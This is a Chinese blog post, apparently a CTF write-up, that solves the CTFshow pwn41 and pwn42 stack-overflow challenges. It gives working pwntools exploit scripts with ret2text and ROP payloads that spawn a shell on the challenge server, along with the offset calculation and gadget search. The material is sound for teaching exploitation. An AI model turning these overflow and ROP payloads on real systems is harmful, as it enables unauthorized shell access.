CTFshow-pwn入门-栈溢出pwn41-pwn42

最新推荐文章于 2024-04-24 17:31:44 发布
最新推荐文章于 2024-04-24 17:31:44 发布
阅读量1k 收藏 24
点赞数 22
分类专栏: CTFShow pwn 文章标签: linux 安全 网络安全 系统安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52635170/article/details/135247362
版权
CTFShow 同时被 2 个专栏收录
25 篇文章 14 订阅
订阅专栏
pwn
13 篇文章 10 订阅
订阅专栏

pwn41

在这里插入图片描述
我们首先将pwn文件下载下来,拖入到虚拟机查看一下文件的保护信息。

chmod +x pwn
checksec pwn

在这里插入图片描述
该文件只开启了栈不可执行,并且文件是32位的。
我们把文件托到ida32中查看一下反编译代码。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  logo(&argc);
  ctfshow();
  puts("\nExit");
  return 0;
}

ssize_t ctfshow()
{
  char buf[14]; // [esp+6h] [ebp-12h] BYREF

  return read(0, buf, 0x32u);
}

int hint()
{
  system("echo flag");
  return 0;
}

int useful()
{
  return printf("sh");
}

先简单说下这道题的思路,首先ctfshow函数中buf数组长度为14,却需要读入0x32个长度的数据,显然存在栈溢出。其次我们还可以注意到,hint函数中存在system函数,我们可以plt表中获取system函数的地址,然后再从useful函数获取到sh的地址,这样就可以拼凑处system(“sh”),进而拿到服务器的shell。

编写exp

计算溢出长度

在这里插入图片描述
从ctfshow函数中可以看到,buf在栈中的位置在ebp上面12h处,加上ebp本身所占栈单元的4个字节,那么栈溢出的长度就为0x12h+0x4h

拿到system函数的地址

使用objdump命令获取文件的plt表,从而直接拿到system函数的地址。

objdump -d -j .plt pwn

在这里插入图片描述
system函数的地址为:0x080483d0

拿到sh的地址

直接在ida中点击sh,可以直接跳转到data段从而拿到sh的地址。
在这里插入图片描述
sh的地址为:0x080487BA

写exp.py

from pwn import *

io = remote("pwn.challenge.ctf.show", "28160")

offset = 0x12 + 0x4

system_addr = 0x080483d0
sh_addr = 0x080487BA

payload = offset * 'a' 
payload += p32(system_addr)
payload += 'a' * 4 # 表示system函数的返回地址,由于不需要返回到某个地方,所以用4个字节顶替
payload += p32(sh_addr)

io.sendline(payload)
io.interactive()

在这里插入图片描述
在这里插入图片描述
成功拿到flag。

pwn42

在这里插入图片描述
首先我们还是先将文件下载下来,托到虚拟机查看保护信息。

chmod +x pwn
checksec pwn

在这里插入图片描述
文件的保护信息与上道题目几乎一样,开启了栈不可执行,只不过这个文件是64位的。那我们就先把他拖进到ida64中查看他的反编译代码。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  logo();
  ctfshow();
  puts("\nExit");
  return 0;
}

ssize_t ctfshow()
{
  char buf[10]; // [rsp+6h] [rbp-Ah] BYREF

  return read(0, buf, 0x32uLL);
}

__int64 hint()
{
  system("echo flag");
  return 0LL;
}

int useful()
{
  return printf("sh");
}

这道题的代码几乎跟上道题也是差不多的,还是一样的思路,利用ctfshow函数中buf的栈溢出,通过hint函数的system函数与useful函数的sh相结合拼凑成system(sh)来获得shell。

只不过在64位中,需要堆栈平衡 ,并且64位的传参和32位也不一样。

具体64位传参方式如下:
当参数少于7个时, 参数从左到右放⼊寄存器: rdi, rsi, rdx, rcx, r8, r9。
当参数为7个以上时, 前 6 个与前⾯⼀样, 但后⾯的依次从 “右向左” 放⼊栈中,和32位汇编⼀样。

编写exp

计算溢出长度

在这里插入图片描述
首先可以观察到,buf在栈中的位置在rbp上面Ah处,加上rbp本身所占栈单元的长度为8(32位为4,64位为8),那么溢出长度就为0xa + 0x8

拿到system函数的地址

还是通过使用objdump命令来获得文件的plt表从而拿到system函数的地址。

objdump -d -j .plt pwn

在这里插入图片描述
system函数的地址为:0x0000000000400560

拿到sh的函数地址

直接在ida中点击sh,即可跳转到data段,就可以获得sh的地址了。
在这里插入图片描述
sh的地址为:0x0000000000400872

拿到pop rdi;ret和ret的地址

pop rdi,把参数pop到rdi寄存器中,再通过ret将程序的执行流控制到我们在栈中传入的恶意地址。

ROPgadget --binary pwn --only "pop|ret"

在这里插入图片描述
pop rdi;ret的地址为:0x0000000000400843
ret的地址为:0x000000000040053e

ret是为了64位的堆栈平衡,具体堆栈平衡的知识可以看一下两篇文章
https://www.cnblogs.com/ZIKH26/articles/15996874.html
https://blog.csdn.net/hu_c_t_f/article/details/131902515

写exp.py

from pwn import *

io = remote("pwn.challenge.ctf.show", "28142")

offset = 0xa + 0x8

pop_rdi = 0x0000000000400843
ret = 0x000000000040053e
sh_addr = 0x0000000000400872
system_addr = 0x0000000000400560

payload = offset * 'a'
payload += p64(pop_rdi)
payload += p64(sh_addr)
payload += p64(ret)
payload += p64(system_addr)

io.sendline(payload)
io.interactive()

在这里插入图片描述
在这里插入图片描述
成功拿到flag。

你们de4月天
关注
  • 22
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
PWN入门之栈迁移-附件资源
03-02
PWN入门之栈迁移-附件资源
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1033
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1851
ctfshow pwn入门-前置基础pwn13-pwn19
CTFshow-PWN-栈溢出pwn41-pwn42
最新发布
Welcome To Myon'Blog !
04-24 528
32位的 system();但是没"/bin/sh" ,好像有其他的可以替代检查一下:32 位程序ida32 分析:跟进 ctfshow 函数:存在栈溢出buf 到栈底距离:0x12存在 system 函数:system 函数地址:0x80483D0但是并未找到 /bin/sh找到了一个 useful 函数:该函数调用了 printf 函数,并传入字符串 "sh" 作为参数,然后将 printf 函数的返回值作为 useful 函数的返回值。
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 3178
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow-pwn入门-前置基础pwn29-pwn31
T1ngSh0w的博客
06-21 1481
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
pwn06(关于64位程序堆栈平衡的处理)
Welcome To Myon'Blog !
07-07 899
堆栈平衡: 当我们在堆栈中进行堆栈的操作的时候,一定要保证在RET这条指令之前,ESP指向的是我们压入栈中的地址,函数执行到ret执行之前,堆栈栈顶的地址 一定要是call指令的下一个地址。
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
PWN入门之数组越界-附件资源
03-02
PWN入门之数组越界-附件资源
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9377
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
CTFshow PWN入门 Test_your_nc
2301_79612324的博客
12-24 395
需使用chmod +x给文件添加可执行权限system()函数里参数为"cat /ctfshow_flag",直接nc运行即可得到flag。
CTFshow-pwn入门-栈溢出pwn39-pwn40
T1ngSh0w的博客
12-27 1005
CTFshow-pwn入门-栈溢出pwn39-pwn40
CTFshow-PWN入门-Test_your_nc详解
weixin_63576152的博客
07-29 1331
本文主要详解CTFshow中pwn入门第一块内容Test_your_nc的五道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境(小编的轻薄本已经容不提供的专用虚拟机了QAQ)
CTFSHOW_WEB入门web213
A的博客
08-07 978
查了弄了好久才弄出来,PHPSESSID在F12储存里面找。下面是ctfshowweb213.py。
CTFshow-pwn入门-栈溢出 (慢慢更
akdelt的博客
01-31 1039
当应用程序试图对无权访问的内存地址进行读写操作时,会调用 sigsegv_handler 函数,sigsegv_handler 函数 会把stderr打印输出,即将flag的值打印输出那么我们直接输入超长数据就会溢出,程序就会崩溃进而打印出flag。char dest;该函数无法限制输入的长度,可能会超出s数组的容量,导致覆盖栈上的其他数据或执行任意代码。这也是明显的栈溢出漏洞,且提供后门函数 get_flag()堆栈不可执行,不过有后门函数,跟进 ctfshow 函数,read 可以读取 50 个字节。
ret2text涉及到的堆栈平衡问题
qq_41560595的博客
01-04 4494
这个指令要求rsp+0x40的值是16字节对齐。 错误的题解: from pwn import * io=process("./level0") raw_input() elf=ELF("./level0") system_addr=0x400596 io.recvuntil(b"World\n") payload=b"A"*(0x88)+p64(system_addr) io.send(payload) io.interactive() $rsp+0x40没有16字节对齐。 正确的题解: fro.
ctfshow PWN 栈溢出
08-23
PWN是一种以攻破计算机系统中的漏洞为目的的竞赛类型,参赛者需要利用漏洞进行攻击并获取系统权限。在ctfshow PWN中,栈溢出是一种常见的攻击方式。 根据提供的引用,我了解到栈溢出是一种通过向程序输入过长的数据导致数据溢出栈的一种攻击手段。栈是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等信息。当程序接收到超出栈空间大小的数据时,溢出的数据会覆盖到栈上的其他数据,从而可能改变程序的执行流程。 根据引用,在ctfshow PWN中,参赛者可以利用栈溢出漏洞来控制程序的执行流程。通过向程序输入特制的数据,可以覆盖控制流中的返回地址,使程序跳转到攻击者精心构造的代码,从而达到获取系统权限的目的。 具体来说,参赛者可以通过向程序发送超出预期的数据,覆盖栈上的返回地址,使其指向攻击者准备好的恶意代码,从而实现栈溢出攻击。攻击者可以利用此漏洞来执行任意代码,包括获取系统权限、执行恶意操作等。 引用和引用提供了一些示例代码,演示了如何利用栈溢出漏洞进行攻击。这些代码使用Pythonpwn库来与目标程序进行交互,并通过构造特制的payload来触发栈溢出漏洞,最终实现控制程序执行流程的目的。 需要注意的是,栈溢出是一种非常危险的漏洞,合法的程序设计应该避免出现此类问题。在实际应用中,为了防止栈溢出攻击,开发者需要加强输入验证和数据处理等安全机制。 总结起来,ctfshow PWN栈溢出是一种通过向程序输入过长数据导致栈溢出的攻击方式,在该竞赛中常用于获取系统权限和执行恶意操作。攻击者可以利用漏洞覆盖返回地址,使程序执行恶意代码。然而,栈溢出是一种危险的漏洞,合法的程序设计应该避免此类问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [ctfshow pwn4](https://blog.csdn.net/qq_39980610/article/details/126461902)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [ctfshow pwn5](https://blog.csdn.net/qq_39980610/article/details/126462163)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你们de4月天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值